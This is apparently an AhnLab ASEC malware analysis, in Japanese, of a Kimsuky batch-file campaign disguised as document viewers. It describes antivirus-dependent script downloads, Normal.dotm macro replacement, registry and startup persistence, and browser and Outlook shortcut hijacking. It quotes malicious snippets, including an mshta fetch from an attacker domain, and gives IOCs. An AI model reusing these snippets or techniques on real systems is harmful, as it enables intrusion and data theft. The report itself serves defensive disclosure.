ASEC (AhnLab Security Emergency response Center)は、バッチファイル(*.bat)形式のマルウェアが拡散していることを確認した。このマルウェアはユーザー環境にインストールされた当社製品を含むアンチウイルスのプロセスによって様々なスクリプトをダウンロードする。マルウェアが使用する関数名、ダウンロード URL のパラメータ等からして、Kimsuky グループが配布したものと推定される。
マルウェアの正確な配布経路は確認されていないが、電子メールを通じて配布されるものと見られる。確認されたバッチファイルのファイル名は以下のように Word、アレアハングル等のドキュメントプログラムのビューアであるかのように装っている。
| 確認日 | ファイル名 |
|---|---|
| 03.22 | docview.bat |
| 03.28 | pdfview.bat |
| 06.12 | hwp.bat |
| 06.20 | docxview.bat |
| 06.21 | pdf.bat |
バッチファイルを実行すると explorer コマンドによって Google Drive および Docs に接続する。これによって Google Docs および Drive にアップロードされたドキュメントファイルが実行され、ビューアプログラムを実行したかのように見せている。実行されるドキュメントの大半は軍事、南北統一に関する内容を含んでいる。
| ドキュメントのタイトル | 接続 URL |
|---|---|
| 米・インド太平洋戦略の軍事安全保障的検討 – 米・インド太平洋司令部を中心として.pdf | hxxps://drive.google.com/file/d/1e41uC2ZTYvTc3CvS6wIKox22AGdP4nFB/view?usp=sharing |
| Consent Form_Princeton Study.pdf | hxxps://drive.google.com/file/d/1tI4J95-7HDGES8e6oHR-wu0cXD8wHPUc/view?usp=sharing |
| 自由民主主義原則のもと朝鮮半島統一を成し遂げ、繁栄した祖国を建設すべき.pdf | hxxps://docs.google.com/document/d/1NJfvSpdku2PW3gwg0dnoELrlVp3CEGB4mtNIFE4bOVE/edit?usp=sharing |
| NK_nuclear_threat.docx | hxxps://docs.google.com/document/d/1C3h0agp3E6Z4a9z-YxnMTgP3Fd9y8n2C/edit?rtpof=true&sd=true |
| 韓米同盟(グローバル国防)-new.hwp | hxxps://drive.google.com/file/d/1rCws6IDhJvynpM3TOSv3IKGWNKXI5uH9/view?usp=sharing |
その後、wmic コマンドを使用して様々なアンチウイルスのプロセスを確認する。攻撃者は、ユーザー環境において実行中のアンチウイルスプロセスの種類によって異なるスクリプトをダウンロードする。
| 確認するアンチウイルス製品 (プロセス名) |
ダウンロードパスおよびファイル名 | ダウンロード URL |
|---|---|---|
| Kaspersky (avpui.exe, avp.exe ) |
%appdata%\Microsoft\Templates\Normal.dotm | hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif |
| c:\users\public\videos\video.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif | |
| Avast ( avastui.exe, avgui.exe ) |
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\onenote.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif |
| Ahnlab ( v3 ) |
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\onenote.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif |
| %appdata%\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif | |
| ALYac (ayagent.aye) |
%appdata%\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif |
| 確認された製品が存在しない場合 |
- Kaspersky (avpui.exe, avp.exe)プロセスが確認された場合
攻撃者はデフォルトのドキュメントテンプレートである Normal.dotm を変更するため、Word プロセスを終了して hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif から dotm ファイルをダウンロードし、Normal.dotm を変更する。ダウンロードされた Normal.dotm には以下のように cmd.exe を非表示ウィンドウで実行する VBA コードが挿入されている。現在は単純に cmd.exe を実行するだけだが、攻撃者の意図により様々なコマンドが実行される可能性がある。
Sub autoopen()
On Error Resume Next
a = Shell("cmd.exe", 0)
End Subその後 hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif から video.vbs をダウンロードしたあと、持続的に実行されるように以下のレジストリに登録する。
- レジストリ:HKEY_CURRENT_USER\Software\Microsoft\Command Processor
- 名前:AutoRun
- 値:wscript.exe c:\users\public\videos\video.vbs
video.vbs ファイルを実行すると、%appdata%\Microsoft フォルダーに「qwer.gif」が存在する場合「qwer.bat」にファイル名を変更したあとで実行し、「qwer.gif」が存在しない場合 hxxp://joongang[.]site/pprb/sec/d.php?na=battmp からダウンロードして実行する。
解析当時の上記 URL から確認されたコマンドは以下の通りである。
- Avast ( avastui.exe, avgui.exe )プロセスが確認された場合
攻撃者は hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif から追加のスクリプトをダウンロードし、ダウンロードしたスクリプトが持続的に実行されるようにスタートアッププログラムフォルダーに onenote.vbs の名前で保存する。
onenote.vbs ファイルを実行すると WMI を利用して Win32_Battery および Win32_Process の Description を収集して前述した video.vbs ファイルをダウンロード、Run キー登録を実行する。
また、特定のフォルダーに存在するブラウザおよび電子メール関連のショートカット(*.lnk)ファイルの位置またはプロパティを変更して、ユーザーが Outlook およびブラウザを実行するためにそのショートカットファイルをクリックすると、攻撃者が設定した不正なコマンドが同時に実行される。
このために、攻撃者は C:\Users\Public\Desktop に存在するブラウザおよび電子メール関連のショートカットファイルを C:\Users\[user 名]\Desktop\[ファイル名] に移動する。その後、プロパティを変更して、下記の表に記載されたフォルダーに存在し、特定のファイルを実行するショートカットファイルの argument を修正する。
| フォルダー名 | LNK の target ファイル名 | 変更される LNK の Arguments |
|---|---|---|
| C:\Users\Public\Desktop (C:\Users\[user 名]\Desktop に移動してプロパティを変更) |
msedge.exe chrome.exe outlook.exe whale.exe firefox.exe |
cmd.exe /c start [ファイル名] [既存の Arguments] [攻撃者が設定したコマンド] |
| C:\Users\[user 名]\Desktop | ||
| %appdata%\Microsoft\Internet Explorer\Quick Launch” |
解析当時、Avast プロセスが確認された場合にダウンロードされた onenote.vbs には[攻撃者が設定したコマンド]が存在しなかったが、攻撃者の意図によって様々な不正なコマンドが実行される可能性がある。
その後、収集した情報を hxxps://joongang[.]site/pprb/sec/r.php に転送する。転送されるデータは以下の通りである。
| [バッテリー情報] [プロセス情報] ENTER bin short ok |
- Ahnlab ( v3 )プロセスが確認された場合
Avast プロセスが確認された場合と類似しており、hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif から追加のスクリプトファイルをダウンロードしてスタートアッププログラムフォルダーに onenote.vbs というファイル名で保存する。
上記スクリプトファイルは前述した onenote.vbs(?na=sh_ava.gif)と同じ機能を実行するが、hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif からダウンロードされた onenote.vbs にはショートカットファイルのプロパティ変更時に変更される Arguments に含まれる[攻撃者が設定したコマンド]が確認された。
& echo Set ws = CreateObject(""WScript.Shell""):
a=ws.run(""mshta.exe hxxps://joongang[.]site/pprb/sec/t1.hta"",0,false) > ""%appdata%\1.vbs""
& start wscript.exe /b ""%appdata%\1.vbs
したがって、ユーザーがブラウザおよび Outlook のショートカットファイルを実行するたびに hxxps://joongang[.]site/pprb/sec/t1.hta にあるスクリプトが %appdata%\1.vbs に保存および実行される。解析当時、この URL には以下のようにウィンドウを閉じるコマンドが存在していた。
On Error Resume Next
window.close()その後、Kaspersky (avpui.exe, avp.exe )および Avast ( avastui.exe, avgui.exe )プロセスが確認された場合を除き、hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif から追加のスクリプトをダウンロードして %appdata% フォルダーに asdfg.vbs として保存する。
ダウンロードされた asdfg.vbs ファイルは CleanupTemporaryState の名前でタスクスケジューラに登録し、41分ごとに実行されるようにする。
asdfg.vbs ファイルは video.vbs と同じく hxxps://joongang[.]site/pprb/sec/d.php?na=battmp から追加のスクリプトをダウンロードして実行する。
解析当時は実行ファイルのダウンロード等の振る舞いは存在しなかったが、様々なスクリプトをダウンロードして実行することからして、スクリプトに存在するコマンドによって未確認のさらなる不正な振る舞いが実行される可能性がある。また、攻撃者はデフォルトのドキュメントテンプレートである Normal.dotm を置換え、ブラウザおよび電子メール関連のショートカットファイルを修正した。これにより、ユーザーは Word ドキュメントや Chrome 等のインターネットブラウザプログラム、Outlook プログラムのショートカット(*.lnk)ファイルを実行する際に不正なスクリプトがダウンロードされる恐れがあるため、特に注意が必要である。
[ファイル検知]
Downloader/BAT.Generic.S2300 (2023.06.26.03)
Trojan/VBS.Agent.SC190255 (2023.06.30.00)
Trojan/VBS.Agent.SC190256 (2023.06.30.00)
Downloader/VBS.Agent.SC190254 (2023.06.30.00)
[행위 진단]
Execution/MDP.Curl.M4675
Execution/MDP.Curl.M11183
Execution/EDR.Curl.M11182
[IOC]
MD5
7d79901b01075e29d8505e72d225ff52
00119ed01689e76cb7f33646693ecd6a
8536d838dcdd026c57187ec2c3aec0f6
a7ac7d100184078c2aa5645552794c19
URL
hxxp://joongang.site/pprb/sec/
hxxp://joongang.site/doc/
hxxp://joongang.site/docx/
hxxp://namsouth.com/gopprb/OpOpO/
hxxp://staradvertiser.store/signal/
[References]
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報